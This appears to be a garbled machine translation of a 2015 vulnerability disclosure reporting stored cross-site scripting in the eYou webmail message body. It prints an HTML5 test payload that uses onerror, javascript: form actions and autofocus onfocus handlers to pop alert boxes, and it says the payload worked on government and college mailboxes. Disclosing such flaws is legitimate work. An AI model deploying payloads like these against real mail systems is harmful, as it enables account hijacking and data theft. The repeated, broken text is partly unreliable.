eYou mail system The message body stored XSS(HTML5 features and need to click on the-vulnerability warning-the black bar safety net

2015-02-14T00:00:00
ID MYHACK58:62201559111
Type myhack58
Reporter 佚名
Modified 2015-02-14T00:00:00

Description

Since eyou version number is different, the following test code The effect is a subtle distinction, but the presence of the vulnerability causes of the same.

Test code: <!-- [if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>after sending the open, the effect is as shown: A government e-mail:

!

!

Some colleges email:

!

Vulnerability proof:

Since eyou version number is different, the following test code The effect is a subtle distinction, but the presence of the vulnerability causes of the same. Test code: <!-- [if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>after sending the open, the effect is as shown: A government e-mail:

!

!

Some colleges email:

!